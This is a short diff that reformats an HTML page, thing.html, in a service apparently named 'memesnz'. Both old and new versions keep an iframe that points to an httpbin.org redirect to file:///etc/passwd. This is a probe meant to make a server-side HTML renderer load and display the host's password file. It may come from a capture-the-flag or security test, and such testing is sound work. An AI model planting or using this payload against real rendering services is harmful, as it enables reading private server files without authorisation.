--- a/server/services/memesnz/src/thing.html
+++ b/server/services/memesnz/src/thing.html
@@ -1,10 +1,13 @@
 <!DOCTYPE html>
 <html>
-<head>
-<title>hi</title>
-</head>
-<body>
-<h1>hi</h1>
-<iframe style="height: 10000px;" src="https://httpbin.org/redirect-to?url=file:///etc/passwd"></iframe>
-</body>
+  <head>
+    <title>hi</title>
+  </head>
+  <body>
+    <h1>hi</h1>
+    <iframe
+      style="height: 10000px"
+      src="https://httpbin.org/redirect-to?url=file:///etc/passwd"
+    ></iframe>
+  </body>
 </html>
